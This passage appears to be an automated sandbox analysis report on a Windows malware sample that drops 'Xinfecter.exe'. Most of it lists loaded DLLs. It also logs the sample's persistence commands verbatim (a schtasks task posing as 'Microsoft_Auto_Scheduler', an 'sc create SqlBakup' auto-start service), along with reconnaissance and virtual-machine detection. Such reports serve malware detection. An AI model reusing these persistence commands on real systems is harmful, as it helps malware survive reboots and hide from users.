      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: netapi32.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: wininet.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: samcli.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: dsrole.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: xKvkNk9SXR.exe | Static file information: File size 1257984 > 1048576
      Source: xKvkNk9SXR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: xKvkNk9SXR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: xKvkNk9SXR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: xKvkNk9SXR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: xKvkNk9SXR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: xKvkNk9SXR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: xKvkNk9SXR.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: xKvkNk9SXR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\Unknown\source\repos\ConsoleApplication5_A\Release\ConsoleApplication5_A.pdb source: xKvkNk9SXR.exe, Xinfecter.exe.0.dr
      Source: xKvkNk9SXR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: xKvkNk9SXR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: xKvkNk9SXR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: xKvkNk9SXR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: xKvkNk9SXR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A500BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A500BB
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A41557 push ecx; ret 0_2_00A4156A
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A41BB6 push ecx; ret 0_2_00A41BC9
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00614748 push CD380F00h; iretd 42_2_0061474D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00631557 push ecx; ret 42_2_0063156A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00631BB6 push ecx; ret 42_2_00631BC9

      Persistence and Installation Behavior

      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File created: C:\Windows\SysMain.sys
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File created: C:\Users\user\AppData\N-Save.sys
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

      Boot Survival

      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATA
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto

      Hooking and other Techniques for Hiding and Protection

      Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 3586
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A29908 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A29908
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
      Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | API coverage: 8.4 %
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | API coverage: 2.5 %
      Source: C:\Windows\SysWOW64\timeout.exe TID: 1396 | Thread sleep count: 123 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 4828 | Thread sleep count: 131 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 1196 | Thread sleep count: 128 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 6512 | Thread sleep count: 124 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 1120 | Thread sleep count: 134 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 4852 | Thread sleep count: 134 > 30
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File Volume queried: C:\ FullSizeInformation
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File Volume queried: \Device\CdRom0\ FullSizeInformation
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C8240 SetErrorMode,FindFirstFileW,0_2_009C8240
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C8380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,0_2_009C8380
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009BFCC9 FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_009BFCC9
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009CAF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,0_2_009CAF50
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C9ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_009C9ABA
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A7BA6B FindFirstFileExA,0_2_00A7BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B8240 SetErrorMode,FindFirstFileW,42_2_005B8240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B8380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,42_2_005B8380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005BAF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,42_2_005BAF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0066BA6B FindFirstFileExA,42_2_0066BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B9ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,42_2_005B9ABA
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009CD950 GetLogicalDriveStringsA,0_2_009CD950
      Source: wscript.exe, 0000000E.00000003.2092655057.0000000002908000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
